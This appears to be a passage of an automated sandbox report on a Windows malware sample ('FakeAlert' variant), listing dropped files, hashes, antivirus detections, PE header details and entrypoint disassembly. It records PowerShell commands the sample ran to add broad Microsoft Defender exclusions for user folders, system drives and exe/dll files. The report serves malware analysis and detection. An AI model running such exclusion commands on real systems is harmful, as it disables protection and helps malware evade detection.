                                                                                                                                                                                  SHA-256:E5BDA8AF2A41C34F47054318E16508C53718ED641D1404F7C33E1DD1E6142184
                                                                                                                                                                                  SHA-512:D6CBAF433E3EB9680854C381756FC91A97464D614B9A03E3787389901301433AF243D7A183A06CBE6E9DE1CBA2E7E882D6EE5D94AA300872C3B5B684A3DA399B
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:.PNG........IHDR................a....sBIT....|.d....!IDAT8.c`.h........Z...`4...F..........N......IEND.B`.

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\p3Ti5MN.ini

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                  File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1642
                                                                                                                                                                                  Entropy (8bit):5.272581421592352
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24:bsF+0X7jSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+S7j+pAZewRDK4mW
                                                                                                                                                                                  MD5:B6FB539BCAB3116CEA69C000B9D74B91
                                                                                                                                                                                  SHA1:91DCBEA37B11FE5EE1CA774848DD144AA19B6FA1
                                                                                                                                                                                  SHA-256:94CC356127E3401D9F37DDC60770E6B051802B1D0EB7EAF292A03C5D7EE24DAC
                                                                                                                                                                                  SHA-512:C4F7C6C5EB5D21533174C9BD5182F233E2C060D463139C22E7B58E0755EA92D680420ACBDAE717BE742AA9429FB9D0C91BF14EEA85B1CFD893A78610B89EC1CC
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="V6uQV_DFuTz69vnKPOKoRg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\sGgz8WE.ini

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                  File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1642
                                                                                                                                                                                  Entropy (8bit):5.2606686072324695
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24:bsF+039SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+G9+pAZewRDK4mW
                                                                                                                                                                                  MD5:BD38955B991754EFE470B8DD1FDDF581
                                                                                                                                                                                  SHA1:D3E2177D57A5622FDA732CBF9F2315F1974924D0
                                                                                                                                                                                  SHA-256:39E3B7C900CD1A506A61DC377E9DC0FBDA1FA1A56F468AC4C6B53BE210A758FA
                                                                                                                                                                                  SHA-512:15AE86563E7518EB2E2B29987414C4C2A6590030C8DB796B6C8A0073F50B52D707F79E28A3E58BAF33E42A281641E1A13D688D18095F1F431DE93493CA3C98C0
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="h2QCmLkBa5UMVbBw2_3n4Q">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\tARkXYN.ini

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                  File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1642
                                                                                                                                                                                  Entropy (8bit):5.2755014329235905
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24:bsF+0Z/SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK++/+pAZewRDK4mW
                                                                                                                                                                                  MD5:354E2C57D378E5EA6BC9709146EAD0BC
                                                                                                                                                                                  SHA1:CA1F92B59F6E49813EE4C3B224DCBE188B482728
                                                                                                                                                                                  SHA-256:EC8F675F0B39B4FE025E1E1FFEE9EAD23C18F22A578407CFB061059C2EC5C1A8
                                                                                                                                                                                  SHA-512:4305F1497F8E9AA6BF4AB37126D2DAE314B7DA2BECEC76009D6EB498FE1984C75E21E8ED20E0340C98D584C91A1D2FB7395BEB77931574534B202A14B8C2FE44
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="UybNnfUTId6PZOGyPPR7KA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\td7DLxd.ini

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                  File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1642
                                                                                                                                                                                  Entropy (8bit):5.267316178507448
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24:bsF+07ZSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+K+pAZewRDK4mW
                                                                                                                                                                                  MD5:0E6661BB2B5A360FAD648504CFAB865F
                                                                                                                                                                                  SHA1:DA492B9CB24E48B17B969E3B3D963519F97F099F
                                                                                                                                                                                  SHA-256:E06FF37FA3DE709ACC66E9504BF60F44F395DE2E51588D7BFA944AEBD532FA7A
                                                                                                                                                                                  SHA-512:DD6C5F2C6CBE63D8E824D859A211380DD28C15A59944D1C21497561112F9F3E103E69A60C01F35991E9A0C40F7217100D8D6E76048184CAEE380E94620B12BAE
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="2OHPjf6y9NY3HVV-pbgiUg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\udfrielser.ini

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Users\user\Desktop\._cache_uniformerede.exe
                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):31
                                                                                                                                                                                  Entropy (8bit):4.453880987666651
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:DIjAW11wA:DYkA
                                                                                                                                                                                  MD5:9ACAEC3B95B7873B0B438825AA485B5B
                                                                                                                                                                                  SHA1:8A7A84F97759EE701402C96B0B5427E031AA92CD
                                                                                                                                                                                  SHA-256:13B015F0138E1D08D4A91CA186CF126CAD93ED8F2900457EA1212E816D70BCC5
                                                                                                                                                                                  SHA-512:F95ED36556398C6E08DE3466A472504011FBA1F27A77ED310C10F47784B464C9B49FD0F06DF161766F47BD106B3BC70E610BDD3AE717E290989813A7AB7D763F
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:[GLASFIBRES]..Lerdues61=Swept..

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\uniformerede.exe

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.Variant.FakeAlert.2.24488.exe
                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1270272
                                                                                                                                                                                  Entropy (8bit):7.2217362129262685
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24576:TnsJ39LyjbJkQFMhmC+6GD9pYhK8VbNIf8gV2D:TnsHyjtk2MYC5GDwhKzy
                                                                                                                                                                                  MD5:FEDAD1ADEC8A1D90444051B5BDC6445D
                                                                                                                                                                                  SHA1:41AD10EE96250D8186D02E3D96923163CB664247
                                                                                                                                                                                  SHA-256:8B0667EC191E96C251FCE90FD0DEECCC09F1024F78FAF78B9FF32DED8B7CBB3D
                                                                                                                                                                                  SHA-512:303A40AC70E1E0BEDC08B55F5A0750A29F7E6EBCB55406293DD0F939D816CADC7FD0F6B604D607FD7478EB851A3648B1E5456CA51C971E494DA680FA44F5A8FE
                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe, Author: Joe Security
                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                  Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*..........................................@..............................................@..............................B*......t....................P...............@..!............@......................................................CODE............................... ..`DATA....T........0..................@...BSS......................................idata..B*.......,..................@....tls.........0...........................rdata..9....@......................@..P.reloc.......P......................@..P.rsrc...t...........................@..P....................................@..P........................................................................................................................................

                                                                                                                                                                                  C:\Users\user\Desktop\._cache_uniformerede.exe

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\uniformerede.exe
                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):498497
                                                                                                                                                                                  Entropy (8bit):7.745692538224731
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:12288:UYhK8VbimV4PPzrMx6I/zghbBmJY18c2qt:UYhK8VbNIf8gV2w
                                                                                                                                                                                  MD5:C4B2332489C0BA3E3F2A262F1C2C31B8
                                                                                                                                                                                  SHA1:9EB3D3CB6B4F160F4DC5A8921A8483A145E814FC
                                                                                                                                                                                  SHA-256:9E5C0EB06D969F8DD4844C1ABAB791C59FEBDDDD82A5239CBCBEB4570DF07A06
                                                                                                                                                                                  SHA-512:B6DD828059E5EA139D691EB2D813E9349F6342E57017F2E57C76C3CF2A94C460A9569561EB18AC22E300992F6CDB44C67C05E438F6A3878E6450A525CE92A9BB
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf.sV..Pf..V`..Pf.Rich.Pf.........................PE..L.....Oa.................h...*......@6............@.......................................@..............................................N...........................................................................................................text...vf.......h.................. ..`.rdata...............l..............@..@.data...x...........................@....ndata...................................rsrc....N.......P..................@..@................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                  C:\Users\user\Desktop\SecuriteInfo.com.Variant.FakeAlert.2.24488.exe

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):2262528
                                                                                                                                                                                  Entropy (8bit):7.487265723978036
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:49152:onsHyjtk2MYC5GDzso5AJs+gYGh3JfEwVu4H:onsmtk2aS5AJJcEws4H
                                                                                                                                                                                  MD5:FA4C249127C8D6D3661A369551570EB3
                                                                                                                                                                                  SHA1:BB1FAA2CD5C36DC224BF162B6C7D381F91A49431
                                                                                                                                                                                  SHA-256:4B7D1627FBFEFB6B1E47A2AF6E4EC95A542C219EACA1AEF57949FA76378D65A1
                                                                                                                                                                                  SHA-512:141F2CDE2F424B8883203463AC093B5789A6C2C2B359CA6CF54E9FA8068F91354CC6873DD885CDC92B60D524C9E9080A710036E39764F4931586F38599A32063
                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.FakeAlert.2.24488.exe, Author: Joe Security
                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                  Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*..........................................@..........................."..................@..............................B*......0....................P...............@..!............@......................................................CODE............................... ..`DATA....T........0..................@...BSS......................................idata..B*.......,..................@....tls.........0...........................rdata..9....@......................@..P.reloc.......P......................@..P.rsrc...0...........................@..P....................................@..P........................................................................................................................................

                                                                                                                                                                                  C:\Users\user\Documents\20220527\PowerShell_transcript.701188.PEGMRVYd.20220527043744.txt

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                  File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):5883
                                                                                                                                                                                  Entropy (8bit):5.400215318736802
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:96:BZIhtNiyqDo1ZQUZLhtNiyqDo1Ze3v1vvvjZWhtNiyqDo1ZsSv/v/v2Zp:v
                                                                                                                                                                                  MD5:D69467F265F7D0E645CA865DEACA44D9
                                                                                                                                                                                  SHA1:874D64130A943BE590F623C1A35D3E7276035C82
                                                                                                                                                                                  SHA-256:715C6B499837F4C13A8ADE747B1B73A2C66137F495324F6D4FD173BECFB717B2
                                                                                                                                                                                  SHA-512:4DF0F16E5CC4248DD1EBD05A1049696867A150517838AE69BD2C3CB6221F32B23DD25ABE8CB52EF0AE9CE091DBDDBE44D401389B9D4FF91150ABA6AC3323C2E5
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:.**********************..Windows PowerShell transcript start..Start time: 20220527043746..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 701188 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell -Command Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force..Process ID: 6348..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20220527043746..**********************..PS>Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force..**********************..Windows PowerShell transcript start..Start time: 20220527044151.

                                                                                                                                                                                  C:\Users\user\Documents\20220527\PowerShell_transcript.701188.kN_b0V1N.20220527043800.txt

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                  File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):5443
                                                                                                                                                                                  Entropy (8bit):5.38492406816387
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:96:BZLhtNdqDo1ZMZthtNdqDo1Z3NgC4jZThtNdqDo1ZDBooiZB:8
                                                                                                                                                                                  MD5:0AB05038288EB62F928B5796E3AB532F
                                                                                                                                                                                  SHA1:A4A7A5967536C785C37C11362D29E12274F9D95A
                                                                                                                                                                                  SHA-256:CF1228D74864069EE2EE22E31725F4716D07F8EF048DC87260AA53696EC5CCBD
                                                                                                                                                                                  SHA-512:07C77B211F3B8C944A9AD1BD0B1ED0E26B952E1EB6CACD74BCEC5D7D2FAA75CE95133C38BA447AF36D7C0C2DC3A06635755CB25702F95F1F76ECC43C3E878129
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:.**********************..Windows PowerShell transcript start..Start time: 20220527043802..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 701188 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell -Command Add-MpPreference -ExclusionExtension @('exe','dll') -Force..Process ID: 6700..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20220527043802..**********************..PS>Add-MpPreference -ExclusionExtension @('exe','dll') -Force..**********************..Windows PowerShell transcript start..Start time: 20220527044104..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 701188 (Microsoft Windows NT 10.0.17134.0)

                                                                                                                                                                                  C:\Users\user\Documents\DUUDTUBZFW\EOWRVPQCCS.xlsm

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                  File Type:Microsoft Excel 2007+
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):18387
                                                                                                                                                                                  Entropy (8bit):7.523057953697544
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:oUaZLPzMfVSa1VvYXmrsdPkLmDAx7r/l0:oUatwNSSvY2IdsHr/y
                                                                                                                                                                                  MD5:E566FC53051035E1E6FD0ED1823DE0F9
                                                                                                                                                                                  SHA1:00BC96C48B98676ECD67E81A6F1D7754E4156044
                                                                                                                                                                                  SHA-256:8E574B4AE6502230C0829E2319A6C146AEBD51B7008BF5BBFB731424D7952C15
                                                                                                                                                                                  SHA-512:A12F56FF30EA35381C2B8F8AF2446CF1DAA21EE872E98CAD4B863DB060ACD4C33C5760918C277DADB7A490CB4CA2F925D59C70DC5171E16601A11BC4A6542B04
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:PK..........!...5Qr...?.......[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0.E.H.C.-..@.5.....(..8...-.[.g.......M^..s.5.4.I..P;..!....r....}._.G.`....Y....M.7....&.m1cU..I.T.....`.t...^.Bx..r..~0x....6...`....reb2m.s.$.%...-*c.{...dT.m.kL]Yj.|..Yp..".G.......r...).#b.=.QN'...i..w.s..$3..)).....2wn..ls.F..X.D^K.......Cj.sx..E..n._ ....pjUS.9.....j..L...>".....w.... ....l{.sd*...G.....wC.F... D..1<..=...z.As.]...#l..........PK..........!..U0#....L......._rels/.rels ...(...............

                                                                                                                                                                                  C:\Users\user\Documents\DUUDTUBZFW\~$EOWRVPQCCS.xlsx

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:modified
                                                                                                                                                                                  Size (bytes):165
                                                                                                                                                                                  Entropy (8bit):1.6081032063576088
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:RFXI6dtt:RJ1
                                                                                                                                                                                  MD5:7AB76C81182111AC93ACF915CA8331D5
                                                                                                                                                                                  SHA1:68B94B5D4C83A6FB415C8026AF61F3F8745E2559
                                                                                                                                                                                  SHA-256:6A499C020C6F82C54CD991CA52F84558C518CBD310B10623D847D878983A40EF
                                                                                                                                                                                  SHA-512:A09AB74DE8A70886C22FB628BDB6A2D773D31402D4E721F9EE2F8CCEE23A569342FEECF1B85C1A25183DD370D1DFFFF75317F628F9B3AA363BBB60694F5362C7
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:.pratesh ..p.r.a.t.e.s.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                                                                                                                                                                                  C:\Users\user\Documents\DUUDTUBZFW\~$cache1

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):771584
                                                                                                                                                                                  Entropy (8bit):6.644060003425038
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:12288:aMSApJVYG5lDLyjsb0eOzkv4R7QnvUUilQ35+6G75V9I4r:ansJ39LyjbJkQFMhmC+6GD9j
                                                                                                                                                                                  MD5:2A1D1C20CCA885322254DD2A22F51097
                                                                                                                                                                                  SHA1:B1E3866401ECA22981F985C17CB4CD9C36F85486
                                                                                                                                                                                  SHA-256:2B88A30E06873F61842038EC6C0E51B954DB482CD4641E33F01B3E80AF9F168D
                                                                                                                                                                                  SHA-512:ED72F56294BDF292A6EB1953CD657842CCFA2DCF3C5E69F24A1B11E19E5D8BD73DA5AAFB5F171CE91DBB07776CF8C2BF9028035E152E2CC8311A3CD21E51A886
                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\Documents\DUUDTUBZFW\~$cache1, Author: Joe Security
                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                  Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................&....................@.......................... ...................@..............................B*...........................P...............@..!............@......................................................CODE............................... ..`DATA....T........0..................@...BSS......................................idata..B*.......,..................@....tls.........0...........................rdata..9....@......................@..P.reloc.......P......................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                                                                                                                                                                  Static File Info

                                                                                                                                                                                  General

                                                                                                                                                                                  File type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                                  Entropy (8bit):7.687518184227138
                                                                                                                                                                                  TrID:
                                                                                                                                                                                  • Win32 Executable (generic) a (10002005/4) 99.94%
                                                                                                                                                                                  • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                                                                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                  • VXD Driver (31/22) 0.00%
                                                                                                                                                                                  File name:SecuriteInfo.com.Variant.FakeAlert.2.24488.exe
                                                                                                                                                                                  File size:1490944
                                                                                                                                                                                  MD5:c5bf732066ab84d1abba5b27638a5191
                                                                                                                                                                                  SHA1:07b3b8a0e9008e459bd7ba727dd8380320dbc5ad
                                                                                                                                                                                  SHA256:a4bdfb7869d435589479e095b8d0c9c2b8f987bd3a8c961424376f18c31c650f
                                                                                                                                                                                  SHA512:2813858f134a0535777e51add46568f6211cc46f23c621bdd74f946665ae918c9b33bc5b54d2de26f087887aed87ead559c5c951eb6e0c3679253bc42724b86e
                                                                                                                                                                                  SSDEEP:24576:Nso5AJseqW68ZKg1gYLCh3JgzRQJHhrbMDEVuI2N1q:Nso5AJs+gYGh3JfEwVu4
                                                                                                                                                                                  TLSH:6F65BE88E9CEA255E81B9774E33DCC3851116D6EACF8184C6CCA7E2337773A6452B631
                                                                                                                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.................................................@.................................<......................................

                                                                                                                                                                                  File Icon

                                                                                                                                                                                  Icon Hash:c4c4c4c8ccd4d0c4

                                                                                                                                                                                  Static PE Info

                                                                                                                                                                                  General

                                                                                                                                                                                  Entrypoint:0x4014a5
                                                                                                                                                                                  Entrypoint Section:.text
                                                                                                                                                                                  Digitally signed:false
                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                  Subsystem:windows gui
                                                                                                                                                                                  Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, DEBUG_STRIPPED, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                                                                                                                                                  DLL Characteristics:
                                                                                                                                                                                  Time Stamp:0x0 [Thu Jan 1 00:00:00 1970 UTC]
                                                                                                                                                                                  TLS Callbacks:
                                                                                                                                                                                  CLR (.Net) Version:
                                                                                                                                                                                  OS Version Major:4
                                                                                                                                                                                  OS Version Minor:0
                                                                                                                                                                                  File Version Major:4
                                                                                                                                                                                  File Version Minor:0
                                                                                                                                                                                  Subsystem Version Major:4
                                                                                                                                                                                  Subsystem Version Minor:0
                                                                                                                                                                                  Import Hash:2a2a662be9dffc461398e7c94d0b55b4

                                                                                                                                                                                  Entrypoint Preview

                                                                                                                                                                                  Instruction
                                                                                                                                                                                  push ebp
                                                                                                                                                                                  mov ebp, esp
                                                                                                                                                                                  sub esp, 00000008h
                                                                                                                                                                                  nop
                                                                                                                                                                                  mov eax, 00000004h
                                                                                                                                                                                  push eax
                                                                                                                                                                                  mov eax, 00000000h
                                                                                                                                                                                  push eax
                                                                                                                                                                                  lea eax, dword ptr [ebp-04h]
                                                                                                                                                                                  push eax
                                                                                                                                                                                  call 00007F0604E46D61h
                                                                                                                                                                                  add esp, 0Ch
                                                                                                                                                                                  mov eax, 00401483h
                                                                                                                                                                                  push eax
                                                                                                                                                                                  call 00007F0604E46D83h
                                                                                                                                                                                  mov eax, 00000001h
                                                                                                                                                                                  push eax
                                                                                                                                                                                  call 00007F0604E46D80h
                                                                                                                                                                                  add esp, 04h
                                                                                                                                                                                  mov eax, 00030000h
                                                                                                                                                                                  push eax
                                                                                                                                                                                  mov eax, 00010000h
                                                                                                                                                                                  push eax
                                                                                                                                                                                  call 00007F0604E46D74h
                                                                                                                                                                                  add esp, 08h
                                                                                                                                                                                  mov eax, dword ptr [005383BCh]
                                                                                                                                                                                  mov ecx, dword ptr [005383C0h]
                                                                                                                                                                                  mov edx, dword ptr [005383C4h]
                                                                                                                                                                                  mov dword ptr [ebp-08h], eax
                                                                                                                                                                                  lea eax, dword ptr [ebp-04h]
                                                                                                                                                                                  push eax
                                                                                                                                                                                  mov eax, dword ptr [00539000h]
                                                                                                                                                                                  push eax
                                                                                                                                                                                  push edx
                                                                                                                                                                                  push ecx
                                                                                                                                                                                  mov eax, dword ptr [ebp-08h]
